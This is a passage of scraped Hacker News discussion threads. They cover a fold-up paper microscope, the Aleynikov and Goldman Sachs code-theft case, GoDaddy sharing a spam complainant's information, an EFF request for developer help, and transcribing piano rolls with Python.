this can also be done with tesseract or encog framework... I don't know what's news about this
44
maccard 1 day ago 0 replies      
Damn, that's better than me!
45
techaddict009 1 day ago 0 replies      
This is really Great. AI is getting really smarter and smarter day by day!
24
Cheap microscopes: Yours to cut out and keep economist.com
313 points by feelthepain  2 days ago   56 comments top 13
1
dm2 2 days ago 3 replies      
How do I purchase one?

Is it possible to attach to a phone to take a picture?

Here is their website: http://www.foldscope.com/

Why would the initial test to 10,000 if it only costs $1. I would gladly pay $5 (if that includes shipping). If there is a version 2, I would gladly pay $5 to purchase that one also.

This reminds me of the Cartmanland commercial, "awesome new themepark, and you can't come!"

2
chrisBob 2 days ago 2 replies      
I think it is a great product, but the numbers are a little misleading. In microscopy the most important number is usually the resolution not the magnification, and 1µm is what you expect from a 20x objective. The 2100x specification doesn't help much and confuses people, but to be fair, a good 20x objective starts in the $200-400 range.
3
dm2 2 days ago 1 reply      
I found this DIY microscope for smartphones if anyone is interested: http://www.instructables.com/id/10-Smartphone-to-digital-mic...
4
cheetahtech 2 days ago 1 reply      
Here is the Ted Talk on the Microscope.

It's quite incredible.

http://www.ted.com/talks/manu_prakash_a_50_cent_microscope_t...

5
nathancahill 1 day ago 0 replies      
This is based on a ball lens. There are several ball lens hacks floating around the internet, like this "iPhone Microscope" research paper[0] and this DIY[1] to build your own. Ball lenses are cheap and you can attach it to cellphone camera lens with a little M3 tape.

The cutout paper part seems to just hold the slide, and pane it in front of the lens.

[0] http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjourna...

[1] http://www.instructables.com/id/Cheap-and-easy-iPhone-micros...

6
zafka 2 days ago 3 replies      
I did a quick search on the glass spheres, and the only place I could find to buy them was Edmund Optics for $15.00 each. Does anyone have a decent source for the lenses?
7
netcraft 2 days ago 1 reply      
Did anyone get in the initial test that can comment on the quality and performance?
8
davexunit 2 days ago 1 reply      
Please tell me that the specifications will be released under a free culture license.
9
gradi3nt 2 days ago 1 reply      
Can anyone comment on the more technical optical properties of this instrument? How does it perform compared to a traditional microscope with the same magnification and resolution?
10
RankingMember 2 days ago 0 replies      
Wow, this is awesome. I've been looking for a cheap microscope to just have around the house and noticed that they indeed haven't changed a lot in cost/features in quite some time.
11
VLM 2 days ago 1 reply      
Note that this is a different meme than the popular "you can make your own working general purpose camera out of cardboard". That meme is moderately popular and has been successfully implemented many times.

This is a different concept, of a precision manufactured, very cheap, single use, very specific medical test microscope generally revolving around a projection display technology.

I'm not saying it's not cool. It is cool and is a net gain to humanity etc. It's just probably not what you're thinking it is based on the short description.

I think a general purpose "print/fold at home" microscope for educational purposes would be interesting, along the lines of numerous successful cardboard photographic cameras, and maybe even useful. The linked article, although also cool, has nothing to do with that meme, and is almost the precise opposite other than common construction material.

Also this is an old story, even if newly reported. I remember watching the TED talk from the TED RSS feed during a blizzard some months ago. As per Colin's post this is the 12th time it's been featured on HN.

12
neals 2 days ago 1 reply      
Are there any images of what a 2100x magnification looks like?
25
Excerpt from Flash Boys about Serge Aleynikov and Goldman Sachs cryptome.org
311 points by peterbotond  5 days ago   200 comments top 35
1
ntakasaki 5 days ago 4 replies      
Continuing the story from his Wiki page:

In March 2011, Aleynikov appealed the conviction, asking the Second Circuit to review the District Court's decision denying his original motion to dismiss the indictment for failure to state a claim.[9]

On February 16, 2012, the United States Court of Appeals for the Second Circuit heard oral argument on his appeal and, later that same day, unanimously ordered his conviction reversed and a judgment of acquittal entered, with opinion to follow.[10] Aleynikov was released from custody the next day.

On April 11, 2012, Dennis Jacobs, Chief Judge of the United States Court of Appeals, published a unanimous decision in a written opinion[10] stating:

On appeal, Aleynikov argues, inter alia, that his conduct did not constitute an offense under either statute. He argues that: [1] the source code was not a "stolen" "good" within the meaning of the NSPA, and [2] the source code was not related to or included in a product that is produced for or placed in interstate or foreign commerce within the meaning of the EEA. We agree, and reverse the judgment of the district court.[9]

In the course of these events, Aleynikov has spent 11 months in prison. Aleynikov has divorced, lost his savings, and his career is ruined.[11]

The government did not seek reconsideration of the Second Circuit's ruling, thus ending federal action against Aleynikov.[12]

2
rdtsc 5 days ago 1 reply      
For those that don't know, Serge is a great Erlang and C++ programmer and he contributes to open source (had some pull requests to Erlang itself).

Here is his Github account:

https://github.com/saleyn

You can find his posts on Erlang's mailing list once in a while.

Two of his interesting projects I am following:

https://github.com/saleyn/erlexec -- a utility to control OS process from Erlang.

https://github.com/saleyn/eixx/ -- Erlang to C++ interface.

3
yukichan 5 days ago 2 replies      
This sucks, but seriously never talk to the police. Don't write anything down. Don't say anything. Don't sign anything. Tell them your name and otherwise just stay silent. They are never trying to help you, they're trying to close their case.
4
Mikeb85 5 days ago 3 replies      
Read the GPL carefully, very carefully...

An organisation counts the same as an individual, and as long as code stays within the organization that doesn't count as 'distribution', and Goldman Sachs is under no obligation to release the code. They even retain the rights to prevent the code being released.

It's easy to hate on Goldman Sachs for many things, but in this case they didn't violate the GPL, and Aleynikov did commit a crime.

5
zx2c4 5 days ago 2 replies      
> He deleted his bash history - the commands he had typed into his own Goldman computer keyboard. To access the computer, he was required to type his password. If he didn't delete his bash history, his password would be there to see, for anyone who had access to the system.

Wait, what?

6
muyuu 5 days ago 2 replies      
Sounds to me like it was Aleynikov who didn't understand the severity of the crime he committed.

I work in a similar environment and I'm fully aware that if I do something remotely like bringing my code from work home, holy crap I'm committing a very VERY serious crime and my employer would go after me as viciously as they could. Very especially if I were to be going somewhere else where this code would set me up to make a new competing engine.

Pushing stuff to SVN and mailing seem innocuous... but depending on what you are actually passing around they can be extremely serious crimes.

7
mcv 5 days ago 0 replies      
Old story. Definitely sucks for him, but mailing yourself proprietary code of a very secretive and ruthless bank is not exactly the smartest thing to do.
8
infinotize 5 days ago 0 replies      
Amazing how naive in some regards a very smart person can be. You don't send yourself source code, and you definitely don't talk to police without a lawyer, or invite them into your house.
9
dfc 5 days ago 0 replies      
I don't understand this bit about the DNI:

  US master spy Clapper says spies steal open source, then immediately claims ownership and classifies it, and prosecutes if the material is disclosed, like Goldman Sachs.

What did Clapper do?

10
artellectual 5 days ago 0 replies      
Seems to me here, the biggest lesson one can learn from this story is don't work for companies like Goldman Sachs. if they don't want to get with the times and understand how the world they don't understand works then they deserve to be technically behind. So on top of not understanding your work as a developer instead of learning how things work, they choose to abuse the law. Worse part is the law is like a big spider web where it traps the small guys while the tigers and elephants walk right through, there is no justice here no matter how many sections you quote or how many laws you read. Best thing is to just be smart and not get involved. There are many opportunities out there for talented developers.
11
crystaln 5 days ago 0 replies      
So, he emailed source code to himself (yes that was illegal and violated his employment contract,) deleted the bash history (there are plenty of other ways to prevent your password from showing up in history,) waived his right to a lawyer, talked endlessly with an FBI agent and was surprised (?!) that the agent was not a computer expert, then signed a confession.

Sorry if I fail to have much sympathy. If you play in the big leagues, you should at least have some sense of self preservation.

12
bayesianhorse 5 days ago 1 reply      
Moral of the story: If you don't want to be thrown in jail for stealing something you didn't steal, don't sign a confession...

In fact it sounds as if the defendant actually phrased most of the confession himself...

13
FD3SA 5 days ago 1 reply      
The programmer types were different from the trader types. The trader types were far more alive to the bigger picture, to their context. They knew their worth in the marketplace down to the last penny. They understood the connection between what they did and how much money was made, and they were good at exaggerating the importance of the link. Serge wasn't like that. He was a little-picture person, a narrow problem solver. "I think he didn't know his own value," says the recruiter.

This infuriates me to no end. These engineers need to be rounded up, and given a serious life lesson on the reality of markets. Knowing your product/service's worth is step 1 of any free market activity.

Engineering is the only profession where the most talented engineers occupy the lowest compensation brackets with respect to their worth. All sorts of bullshit excuses are made up for this (my favorite - they're "Specialists"), but the bottom line is they are not being compensated at anywhere near what they're worth.

This is why startups, and consulting firms, are so key. If the market you're trying to enter is too big for a small operation (like Wall St.), then just consult. Those 20 superstar programmers need to meet up and start a consulting firm. Then, they sell their services to these banks and charge them whatever they want (read: a lot).

They then use this compensation to hire the best engineers from across the world, and keep them out of Wall St's hands. This wouldn't be too difficult, because Wall St would never match salaries because they are traders, and would die before they paid an engineer more than themselves.

To all of HN: please don't underestimate your worth. It hurts everyone, including yourself.

14
gflateman 5 days ago 0 replies      
flash boys also talks about the FBI's suspicion when they heard Aleynikov was using software called 'subversion', and assuming he was thus doing something 'subversive'

that cracked me up!

15
Natsu 5 days ago 0 replies      
> On the night of his arrest, Serge waived his right to call a lawyer. [...] Then he sat down and politely tried to clear up the confusion of this FBI agent who had arrested him without an arrest warrant.

These are things no sane person should do, especially if they're innocent.

16
doktrin 5 days ago 0 replies      
What repeatedly stands out every time I read of this account is the relative ineptitude of the federal agents handling the investigation.

There appears to be every indication that agent McSwain did everything short of taking explicit marching orders from GS.

The FBI either lacked the will or ability to understand the crimes they were tasked with investigating. I find that disturbing.

17
auggierose 5 days ago 4 replies      
There is a simple solution to this. When you publish open source software, make sure that in your license it says that Goldman Sachs is not allowed to use this code for any purpose whatsoever.
18
ececconi 5 days ago 0 replies      
The original link didn't mention this was an excerpt from Flash Boys so I had no clues Michael Lewis wrote it. I've never read any of his books. Now I want to because he actually writes pretty well.
19
fredgrott 5 days ago 0 replies      
the problem I have with the article is that FOSS/OSS used internally and modified for that use and not distributed would mean under normal copyright and work rules that yes GS did own the changes to OSS/FOSS used internally but never distributed.
20
ig1 5 days ago 4 replies      
Flagged because article completely misunderstands how GPL works. GPL doesn't apply if you modify source-code to use internally, it only applies if you distribute it externally to third party users.

[GPL not mentioned in article; my recollection from the original court documents is that the code was largely LGPL and GPL code]

21
ithought 5 days ago 0 replies      
His federal conviction was overturned then they later recharged him for the same incident in state court. Also Congressman Lamar Smith, who sponsored SOPA, amended the Economic Espionage Act of 1996 with the Theft of Trade Secrets Clarification Act of 2012 specifically related to this case.

Sergey's Legal Defense Fund - http://www.aleynikov.org/

22
hynahmwxsbyb 5 days ago 2 replies      
I wonder how much this cost Goldman from a talent perspective.
23
kylemaxwell 5 days ago 1 reply      
I thought the policy here was to use the actual title of the article, not to edit it. Why did the moderators change it?
24
yoamro 5 days ago 0 replies      
Trying to sympathize with the guy, but signing a confession?....just doesn't make sense
25
leccine 5 days ago 0 replies      
Lesson learned, don't ever work for Wall Street.
26
eriktrautman 5 days ago 0 replies      
I don't normally bring this up but in this case the site formatting is essentially unreadable for someone with poor eyesight who needs to expand the text and make the container narrow to avoid constant left/right scrolling.
27
kayoone 5 days ago 1 reply      
"Aleynikov was employed for two years, from May 2007 to June 2009, at Goldman at a salary of $400,000.[1] He left Goldman to join Teza Technologies, a competing trading firm which offered to triple his pay.[5]"

jeez, those banks pay a pretty penny.

28
james-bronze 5 days ago 0 replies      
(I'm sorry if I do this incorrectly; first time posting plus I'm on an app)

"Serge tried to explain why he always erased his bash history, but McSwain had no interest in his story. The way he did it seemed nefarious, the FBI agent would later testify." Whom is the FBI agent referring to, McSwain or Serge?

29
zenbowman 5 days ago 1 reply      
Goldman is a nest of parasites and vultures, do we really expect anything more from them?
30
PythonicAlpha 5 days ago 0 replies      
That is the problem with invention vs. "intellectual property". Inventions belong to the inventor -- property belongs to the owner.
31
caycep 5 days ago 1 reply      
probably OT...but Cryptome posting an excerpt from a Michael Lewis book? that's a bit out of character...
32
senthilnayagam 5 days ago 0 replies      
so effectively Goldman Sacks killed the potential competing high performance trading platform
33
notastartup 5 days ago 0 replies      
This is batshit insane. Wall Street is fucking insane. I hope Serge wins a huge lawsuit.
35
zorbo 5 days ago 4 replies      
Okay, so.

* misleading title. Goldman Sachs stole nothing.

* This guy steals code from Goldman Sachs.

* Covers his tracks. There is almost no reason why your password ever ends up in your bash history. If it does, you edit out only the password. Or you put a space before the command you run. At any rate, this guy should have known how to prevent his password from getting in the shell history and had no reason to delete his history.

* The guy talks to the cops

* Waives his rights to a lawyer

* Signs a confession

* Lets cops into his house without a search warrant.

* Doesn't testify at this trial.

This guy fully deserved what was coming to him. Goldman Sachs did nothing wrong here.

26
GoDaddy Released My Personal Information to a Spammer Troll skepchick.org
307 points by kmfrk  1 day ago   141 comments top 29
1
jxf 1 day ago 7 replies      
While GoDaddy has a point about the opt-in component being important for deciding whether spamming took place, they certainly didn't need to release her personal information to the spammer. That's a terrible, serious breach of privacy.

A naive approach that might work without either party needing to divulge emails:

GoDaddy: "We have received complaints that you've been spamming. Give us a list of SHA-1 hashes of addresses of the people that opted in and show us how they opted in."

Customer: "Here's the list."

GoDaddy: "At least one complaint email we received does not match the SHA-1s on this list."

2
filmgirlcw 1 day ago 0 replies      
I'm loath to defend GoDaddy, but I don't know if they can be "blamed" in this case, if only because what happened here was not the typical spam scenario.

If I'm understanding the situation correctly (and if I'm not, please let me know), a crazy person with an agenda sent a mass-mailing to about hundreds atheists/bloggers in an attempt to push his POV. Skepchick reports him to his email host (in this case, GoDaddy), under their spam terms.

GoDaddy does their standard process, which includes asking for opt-in proof, and revealing the email. Crazy guy goes crazy and makes a website dedicated to trying to defame Skepchick, using info he found about her online.

The problem is, this wasn't typical spam. Meaning, this wasn't some bot sending out Viagra sales pitches or the "great investment leads" people that send me 30 messages a day. This was unsolicited mail, yes, but it was with an agenda. Basically, I'd classify it more as harassment.

I'd imagine the situation would have been handled differently if it was flagged/seen/filed as harassing messages, rather than spam. I don't know, but I have to assume GoDaddy has an abuse team and that their methods of handling this sort of thing would be different.

Please understand, I'm not putting the onus on Skepchick to correctly know how to classify the message. It stands to reason she thought this was spam. But at the same time, I don't know if this sort of edge case is common enough to require a more complex method such as SHA-1 hashes.

Shitty situation all the way around, but I think the biggest problem was this was treated as a normal case of spam, when really it was a case of abuse/crazy.

3
masklinn 1 day ago 2 replies      
So GoDaddy is utterly terrible both when you're their client and when you're not their client. Great. Could that company be burned to the ground already?
4
tomp 1 day ago 5 replies      
TL;DR: User got spam from a website hosted by GoDaddy. User reports spam. GoDaddy wants to be good guy and asks spammer if user opted in (by providing spammer with the user's email). Spammer stops spamming, but harasses user by posting her photo online, which s/he probably got using the email address GoDaddy provided.

In retrospect, I'm sure there are better ways for GoDaddy to investigate such complaints, but I think they didn't do something very evil - an email address is hardly "personally identifiable information". On the other hand, if you don't want your photo to be posted online, don't post your photo online.

5
billyhoffman 1 day ago 1 reply      
Yet another reason to not use GoDaddy!.

I highly recommend Hover as a domain Registrar. Tried them with a few new domains, and loved it so much I migrated everything there.

6
josefresco 1 day ago 1 reply      
To contrast this with a real world example, if your neighbor is having a party and you call in a noise complaint to the police, I don't think they tell the party host "we got a noise complaint from your neighbor at 123 My Street".
7
DEinspanjer 1 day ago 0 replies      
I think all this just goes to reinforce the complete brokenness of e-mail to date.

While the proposals for requesting proof of opt-in via SHA hashes and such seem technically feasible, I think it pretty quickly breaks down when you think about how much cost and overhead that would put on GoDaddy (or law enforcement) to manage.

Think about the volume of spam out there. Then imagine a very tiny fraction of that being reported. Each one of those would require validation. While you could automate all the SHA sum comparison stuff, I don't think you could easily automate the validation of whether the opt-in mechanism was appropriate. If the sender indicates there was an opt-in, the validator must still confirm with the complainant whether that is a true claim. Without that, the system is useless because the spammer just keeps a SHA sum for each of the addresses they've purchased and supplies them along with an "Yes they opted in!" claim.

Manually validating the opt-in mechanism would require lots of manpower, and more importantly, a common and universally agreed upon set of rules for how opt-in should work. There are all sorts of nuance in the way there. Should it be a double confirmation? Does existing business relationship count? If so, what are all the rules regarding what constitutes such a relationship? What about unsubscribing afterward?

Edit: Removing the pessimistic and un-useful concluding paragraph on the hunch that was what warranted downvotes.
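The hash exchange proposed in jxf's comment, together with the limitation raised in the comment above (a matching digest shows only that the sender holds the address, not that its owner opted in), as an added Python example that is not part of any comment in this thread. The function names, verdict strings, normalization rule and sample addresses are all constructed for illustration.

```python
import hashlib


def normalize(address: str) -> str:
    # Assumption: both parties trim whitespace and lowercase before hashing.
    # Without an agreed canonical form, the same mailbox yields different digests
    # and a genuine subscriber would be reported as "no opt-in record".
    return address.strip().lower()


def digest(address: str) -> str:
    # SHA-1 is used only because the comment names it.
    return hashlib.sha1(normalize(address).encode("utf-8")).hexdigest()


def opt_in_digests(addresses):
    """Sender side: the list handed to the provider instead of raw addresses."""
    return {digest(a) for a in addresses}


def review_complaints(complainants, sender_digests, confirmed_opt_in=()):
    """Provider side: the complainant's address is never sent to the sender.

    confirmed_opt_in holds addresses whose owners told the provider directly
    that they did subscribe. Returns {address: verdict}.
    """
    confirmed = {normalize(a) for a in confirmed_opt_in}
    verdicts = {}
    for address in complainants:
        if digest(address) not in sender_digests:
            # The case in the proposed exchange: the sender cannot show opt-in.
            verdicts[address] = "no opt-in record"
        elif normalize(address) in confirmed:
            verdicts[address] = "opt-in confirmed"
        else:
            # A match alone proves possession of the address, not consent:
            # a bought list hashes exactly like a subscribed one.
            verdicts[address] = "claimed, unverified"
    return verdicts


# Constructed sample data.
GENUINE_OPT_INS = ["alice@example.org", "Bob@Example.net "]
PURCHASED = ["carol@example.com"]

if __name__ == "__main__":
    complaint = ["Carol@example.com"]

    honest_list = opt_in_digests(GENUINE_OPT_INS)
    print(review_complaints(complaint, honest_list))

    # Same complaint, but the sender also hashed the list it bought.
    padded_list = opt_in_digests(GENUINE_OPT_INS + PURCHASED)
    print(review_complaints(complaint, padded_list))
```
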

8
alandarev 1 day ago 2 replies      
Despite all my hate towards GoDaddy, I cannot see the happening being their fault.

As tomp pointed out, disclosing email address is part of the process, probably not clearly stated, but GoDaddy handled it well. They issued a fine to a spammer, resolving the initial spamming case.

Worse would be if they have not carried out any actions at all.

Now, concerning the harassment, how come GoDaddy is responsible for trolls being trolls? As Company pointed out, report him to law enforcement. Sue him, or anything, victim has got the spammer's domain, thus all the private information needed to escalate the problem further.

9
lettergram 1 day ago 1 reply      
I would report GoDaddy and the spammer to the police. If the spammer went through all that trouble he's probably nuts.
10
devicenull 1 day ago 1 reply      
Forwarding a complaint onto the end user is standard practice these days. It seems that every few months there is a story like this where someone sends an abuse complaint then is surprised when the hosting company sends it to the end user. For any large enough company it's unlikely a person will even read your complaint before it gets forwarded on. Most complaints are designed to be sent to the end user so it's no surprise companies automate this process.
11
MCarusi 1 day ago 1 reply      
Welcome to GoDaddy's customer service. I don't even let them have my domain names. Use NameCheap (and no, I'm not being paid to endorse them).
12
ooobo 1 day ago 1 reply      
There is a similar, perhaps more significant problem with Twitter's abuse reporting tool[0]. To submit the form, users are required to tick the box that notes they accept the following:

"I understand that Twitter may provide third parties, for example the reported user, with details of this report, such as the reported Tweet. Your contact information, like your email address, will not be disclosed."

I think it highly likely that would encourage further abuse. This has prevented me using the tool in the past, and makes me think Twitter doesn't quite understand the issue.

[0]: https://support.twitter.com/forms/abusiveuser

13
maccard 1 day ago 3 replies      
Well, I struggled to get through the first half of that article. Enough banner ads?
14
mathattack 1 day ago 0 replies      
Was their response really just "Go call the cops"?
15
vannevar 1 day ago 0 replies      
There's no reason to expect professionalism from a company that proudly portrays itself as a gang of leering adolescents.
16
devicenull 1 day ago 0 replies      
Released the same personal information that is widely available via WHOIS, it seems..
17
higherpurpose 1 day ago 0 replies      
Please tell me nobody here is actually using GoDaddy anymore. How many lessons does one need to learn before they realize GoDaddy is an awful company?
18
D9u 1 day ago 0 replies      
The spammer appears to be a religious hypocrite, so why not spam the spammer with religious hypocrisy right from their own playbook?

I would begin with Isaiah 45:7 "I form the light, and create darkness: I make peace, and create evil: I the LORD do all these things."

19
leccine 1 day ago 0 replies      
This is the 3rd article on HN about GoDaddy being an absolute shit-show. I am curious how long they gonna keep up.
20
chris123 1 day ago 0 replies      
Not surprising. GoDaddy does not have a good reputation among anyone I know, and I've been involved with domain names since the mid 1990s. I recommend you research other registrars and consider taking your business to them. I know Namecheap has good prices, 2FA, low prices, and discount codes for people leaving GoDaddy. Best wishes.
21
bmoresbest55 1 day ago 0 replies      
I am not hating on Go Daddy but I will say that articles like these do not come out of left field. There was the incident about two months ago with the @N twitter name that involved them and I have heard other grumblings about them. Then when you have other registrars that offer competitive services and do not have those grumblings, you switch. I did. (namecheap.com) Just sayin'...
22
Ihmahr 1 day ago 0 replies      
They are also elephant killing [1] sopa / pipa supporters [2].

[1] http://gawker.com/5787676/meet-godaddys-ridiculous-elephant-...

[2] http://godaddyboycott.org/

23
LazerBear 1 day ago 6 replies      
So which registrar does HN recommend?

I've used Namecheap before and they were decent, though the dashboard looks like it was built in the 90's.

I checked out Hover but they seem to charge a lot for email.

24
rajbala 1 day ago 2 replies      
"I noticed that the email address it came from as well as the link went to a GoDaddy registered domain."

Who does a whois lookup on domains from spam emails?

25
xroche 1 day ago 2 replies      
I'm still puzzled that people are still using companies like Godaddy, Network Solutions etc.. which collect more horror stories than any other ones. Are customers really that stupid ?
26
mirsimiki 1 day ago 0 replies      
I've lost several domains that simply got deleted from my account. Every time I tried contacting them about the subject they refused to answer.
27
chloratine 1 day ago 0 replies      
Time to switch to proxy email id's, which do not give out the first name or the last name.

From now on, I'll be known as wHzqbUWp at gmail.com

28
chatman 1 day ago 2 replies      
Who on earth reports spam to originating server administrators? It might seem contrary to general sentiments here, but really, why not handle your own problem (and adjust your spam filters) instead of troubling GoDaddy?
29
microcolonel 1 day ago 1 reply      
With Skepchick involved, this seems sketchy.

I'm not going to spend today defending GoDaddy, as they've been a fair fly in the ointment to me. However I would not suggest burning them at the stake because somebody on this particular blog posted an inconclusive statement about a breach which was, as far as we can tell, dealt with already.

As a customer of theirs, I'll probably be contacting them about this to make sure I don't have any similar issues, and suggesting a remedy (probably something like the cryptographic hash based verification method suggested elsewhere on this page) for the future.

27
Dear Web Developers: EFF Needs Your Help eff.org
304 points by frostmatthew  2 days ago   54 comments top 16
1
sinak 2 days ago 2 replies      
Full instructions on how to take part are at this link: http://theunitedstates.io/contact-congress/

And here is the Github repo: https://github.com/unitedstates/contact-congress/

2
Theodores 1 day ago 3 replies      
In the UK we have a decent website for contacting one's MP:

https://www.writetothem.com/about-us

And it works!

For petitions to Number 10 we also have:

http://epetitions.direct.gov.uk/

...and it works, as in you can sign something that will be totally ignored (eyes roll)!

So in every country we are duplicating effort. Hence I think the EFF need to think beyond the shores of that renegade British colony known as the USA. Maybe it is time for some open source system that can be rolled out to everywhere from The Hill to Burkina Faso.

Let's also be honest about those people in congress - do the current batch of revolving door military/corporate oldies that sit there really deserve to be taken seriously? Does anyone believe they understand concepts such as reasoned argument, being fair, the common good, progress, listening instead of speaking, telling the truth instead of lying? Even if they do appear genuinely for the good it can be just an act, as per that person you Americans have for 'President'.

So, to invite participation from the rest of the world and get some enthusiastic input from those that think that the current batch of congressmen are deserved of being Guantanamo-ed, the EFF should think bigger. They should link up with groups that have made progress internationally and work towards a tool for democracy that can work everywhere.

3
rejschaap 1 day ago 4 replies      
I know this is all in good spirit and you just want to show some appreciation for the help. But rewarding programmers by number of commits is a bit perverse. Nowadays everyone generally agrees that paying programmers per line of code is a bad idea. I think rewarding based on number of commits creates very similar unwanted incentives and should probably be avoided completely.
4
joelcollinsdc 1 day ago 1 reply      
The US House of Reps is almost done with development for an API (that was spearheaded by outside organizations like CMF) for 'campaign' communications (communications where the majority of the messages are 'similar') from third party advocacy organizations. After this occurs, the hope is that only messages sent via web forms are completely unique messages sent from constituents without the assistance of a third party. The project has been slow (10 years in the making?) but it's near completion. Achieving 100% adoption amongst the 440 member offices is a different question though, although 100% adoption has been mandated.
5
zachlatta 2 days ago 2 replies      
I think it's really great that the EFF is reaching out to the community like this. I reached out to donate time and I encourage you to do the same.
6
trentmb 2 days ago 2 replies      
> Secure Connection Failed

> An error occurred during a connection to www.eff.org. The OCSP server has no status for the certificate. (Error code: sec_error_ocsp_unknown_cert)

Anybody else getting this?

7
aidos 1 day ago 1 reply      
I'm really impressed with the project. It's a great idea - both the concept and the execution are brilliant.

The bookmarklet for generating the yaml file could be used for all sorts of things - I've never seen this idea before. Even better, it's being used to crowdsource the data for the tool.

I'm really impressed with this. Kudos to all involved.

8
scrozier 1 day ago 0 replies      
Have been completely engrossed in this most of the day. Hope it's done soon or I'll have to go cold turkey.
9
GoodGuy 1 day ago 0 replies      
Here is a very effective german platform for not only contacting, but also making the answers to questions visible:

the site - http://www.abgeordnetenwatch.de/

the code - https://github.com/parliamentwatch/parliamentwatch

the site is in German, but you might guess the content with a little help from an online translator. It is very popular and linked to from the biggest German online media. It might be an indicator for its success that several conservative politicians tried to fight this site with all kinds of tricks, but they still did not succeed :)

Unfortunately the code is drupal, it certainly would be much better to convert this to some more flexible framework like pyramid or django, but it works.

It might be a much better alternative to make questions to congressmen publicly visible than just sending stuff into spam-folders of people that do not have interest at all in being contacted by "the people".

10
chrismeller 1 day ago 1 reply      
They really need some copy editing done on everything for this project.
11
microjesus 2 days ago 3 replies      
"How technical do I need to be?" - not very.

Sorry, what?

12
devb0x 1 day ago 0 replies      
Why the down votes?
13
voltagex_ 2 days ago 0 replies      
EFF != FSF.
14
microjesus 2 days ago 1 reply      
An organization that I had hope in, posts something like this for captcha breaking and subtle bullshit. Really? Is this HN or ODesk?
15
phantom_oracle 1 day ago 5 replies      
Disclosure: Only bother if you are American.

Next time you ask, make sure you specify who you are serving. Congress does not serve me as a foreigner (then again, does it serve everyday Americans either?).

New title:

"Dear US Web Developers: EFF Needs Your Help"

16
ttctciyf 1 day ago 2 replies      
I was pretty surprised to see the EFF's naive take on the Tea Party [1] in "recent deeplinks" underneath the linked article, which seems not to recognize it as pretty much an astroturf instrument of the neo-bircher Kochs [2], [3].

Of course co-opting TP sympathizers around a common goal of opposing overweening government surveillance to unknown purpose is a Good Thing, but unless the EFF, an org I've respected for ages, is unaware of the spurious "grassroots" provenance of the Tea Party, which seems very unlikely, I'd expect a less nakedly revisionist approach from them.

[1] https://www.eff.org/deeplinks/2014/04/tea-party-taxes-and-wh...

[2] http://www.nytimes.com/2010/08/29/opinion/29rich.html?_r=0

[3] http://www.astroturfwars.com

28
Transcribing Piano Rolls, the Pythonic Way zulko.github.io
304 points by gcardone_  6 days ago   35 comments top 16
1
eliteraspberrie 6 days ago 1 reply      
The faster way of doing this:

    def fourier_transform(signal, period, tt):
        """ See http://en.wikipedia.org/wiki/Fourier_transform
        How come Numpy and Scipy don't implement this ??? """
        f = lambda func : (signal*func(2*pi*tt/period)).sum()
        return f(cos)+ 1j*f(sin)
is using the FFT.

What you want is the power spectral density in the discrete case, called the power spectrum. It can be calculated by multiplying the discrete Fourier transform (FFT) with its conjugate, and shifting. NumPy can do it. Here is an example: http://stackoverflow.com/questions/15382076/plotting-power-s...
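The relationship described in the comment above, as an added example that is not part of the original post or of the article's code: the quoted single-period projection is one bin of the discrete Fourier transform, and the power spectrum is the transform multiplied by its conjugate. It goes slightly beyond the comment by including a small pure-Python radix-2 FFT so that it runs without NumPy; the function names and the 64-sample test signal are constructed for illustration.

```python
import cmath
import math


def fft(x):
    """Recursive radix-2 Cooley-Tukey FFT; len(x) must be a power of two."""
    n = len(x)
    if n == 1:
        return [complex(x[0])]
    if n % 2:
        raise ValueError("length must be a power of two")
    even = fft(x[0::2])
    odd = fft(x[1::2])
    out = [0j] * n
    for k in range(n // 2):
        twiddle = cmath.exp(-2j * math.pi * k / n) * odd[k]
        out[k] = even[k] + twiddle
        out[k + n // 2] = even[k] - twiddle
    return out


def power_spectrum(x):
    """|X[k]|^2 for every bin: the transform times its complex conjugate."""
    return [(c * c.conjugate()).real for c in fft(x)]


def single_period_projection(signal, period):
    """The quoted function without NumPy, with tt = 0, 1, ..., N-1.

    It evaluates one frequency in O(N); calling it for every candidate
    period costs O(N^2), which is what the FFT avoids.
    """
    re = sum(s * math.cos(2 * math.pi * t / period) for t, s in enumerate(signal))
    im = sum(s * math.sin(2 * math.pi * t / period) for t, s in enumerate(signal))
    return complex(re, im)


def dominant_period(signal):
    """Period (in samples) of the strongest non-DC bin below Nyquist."""
    n = len(signal)
    power = power_spectrum(signal)
    k = max(range(1, n // 2), key=lambda i: power[i])
    return n / k


# Constructed signal: a strong component with period 16 samples plus a
# weaker one with period 8 samples.
N = 64
SIGNAL = [
    math.cos(2 * math.pi * t / 16) + 0.5 * math.cos(2 * math.pi * t / 8)
    for t in range(N)
]

if __name__ == "__main__":
    spectrum = fft(SIGNAL)
    projection = single_period_projection(SIGNAL, 16)
    # Period 16 over 64 samples is bin k = 64 / 16 = 4; the projection uses
    # exp(+i...), so it equals the conjugate of that FFT bin.
    print(abs(projection - spectrum[4].conjugate()) < 1e-9)
    print(dominant_period(SIGNAL))
```
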

2
msvan 5 days ago 0 replies      
What a fascinating convergence of math, music and Python. Many people I meet who don't specialize in math but have taken university-level courses in it seem to remember the Fourier transform as a highlight, probably because of its many applications.
3
kbd 6 days ago 2 replies      
I love the abundance of Python. For those unaware, even the youtube-dl command line utility he used to download the video is written in Python.
4
stevetjoa 5 days ago 0 replies      
Very cool!

Relevant: Zenph makes "re-performances" of old piano recordings. They take a recording, do music transcription magic to get the exact timings and velocities of each note event, and then feed that into a player piano. So it's as if you are listening to the ghost of Rachmaninov sitting at the piano, as shown here: https://www.youtube.com/watch?v=eevzbV6Hkkk&t=28 (music starts at 0:28)

(I just visited http://zenph.com for the first time in about a year, and it appears that they've pivoted into a music education company.)

5
selmnoo 6 days ago 0 replies      
That was a lovely read, thank you so much for writing and sharing it.
6
nanidin 6 days ago 1 reply      
Interesting question - is the author's transcription a derivative work of the video? And if so, is he actually allowed to release his transcription into the public domain (without the permission of the author of the video)?
7
rfleck 6 days ago 2 replies      
See a master at work making original rolls at QRS. http://www.youtube.com/watch?v=i3FTaGwfXPM

It was a fun place to see in the 70's after watching my father rebuild our player piano.

8
ntoshev 5 days ago 2 replies      
What if you tried to transcribe the music solely from Fourier transform of the audio source? I expect the piano has an abundance of harmonics, but there should be some way to distinguish them from the keys. Hasn't someone done it already?
9
bede 5 days ago 0 replies      
My favourite blog post of 2014. Thank you for sharing.
10
analog31 5 days ago 0 replies      
I think this is a nice solution because it takes care of the hardware side of things by making use of a garden variety video camera.
11
elwell 6 days ago 1 reply      
Really fantastic hack. Now try transcribing with just the audio track.
12
